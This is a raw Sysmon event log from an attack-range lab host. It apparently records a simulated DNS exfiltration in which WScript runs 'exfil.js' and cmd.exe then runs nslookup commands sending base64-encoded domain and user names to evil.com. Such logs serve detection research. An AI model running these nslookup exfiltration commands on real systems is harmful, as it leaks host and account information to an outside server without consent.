14:16:27.785{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199406Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.785{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199405Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.785{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BB-629A-0B40-000000005F02}2036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199404Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.785{2E1864BB-17A1-629A-783D-000000005F02}5552896C:\Windows\System32\WScript.exe{2E1864BB-17BB-629A-0B40-000000005F02}2036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199403Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.796{2E1864BB-17BB-629A-0B40-000000005F02}2036C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcmga.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000199402Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.785{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlbzi.tmpMD5=9C101754059B3D04F26CF3E2F51B88AA,SHA256=CC24D14F511AA03DA88D98786AE6BD9247656E6D05B1882F17E6E6D57E27DA80,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000199401Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.769{2E1864BB-17BB-629A-0940-000000005F02}48165200C:\Windows\system32\conhost.exe{2E1864BB-17BB-629A-0A40-000000005F02}5912C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199400Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.769{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199399Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.769{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199398Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.769{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199397Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.769{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199396Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.769{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BB-629A-0A40-000000005F02}5912C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199395Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.769{2E1864BB-17BB-629A-0840-000000005F02}23365948C:\Windows\system32\cmd.exe{2E1864BB-17BB-629A-0A40-000000005F02}5912C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199394Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.769{2E1864BB-17BB-629A-0A40-000000005F02}5912C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BB-629A-0840-000000005F02}2336C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbzi.tmp 2>&1 10341000x8000000000000000199393Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.738{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17BB-629A-0940-000000005F02}4816C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199392Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.738{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BB-629A-0940-000000005F02}4816C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199391Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.738{2E1864BB-17BB-629A-0940-000000005F02}48165200C:\Windows\system32\conhost.exe{2E1864BB-17BB-629A-0840-000000005F02}2336C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199390Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.722{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BB-629A-0940-000000005F02}4816C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199389Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.722{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199388Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.722{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199387Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.722{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199386Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.722{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199385Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.722{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BB-629A-0840-000000005F02}2336C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199384Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.722{2E1864BB-17A1-629A-783D-000000005F02}55525628C:\Windows\System32\WScript.exe{2E1864BB-17BB-629A-0840-000000005F02}2336C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199383Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.731{2E1864BB-17BB-629A-0840-000000005F02}2336C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbzi.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000199382Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.722{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlkdsl.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000199381Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.706{2E1864BB-17BB-629A-0640-000000005F02}78606372C:\Windows\system32\conhost.exe{2E1864BB-17BB-629A-0740-000000005F02}3168C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199380Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.706{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199379Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.706{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199378Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.706{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199377Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 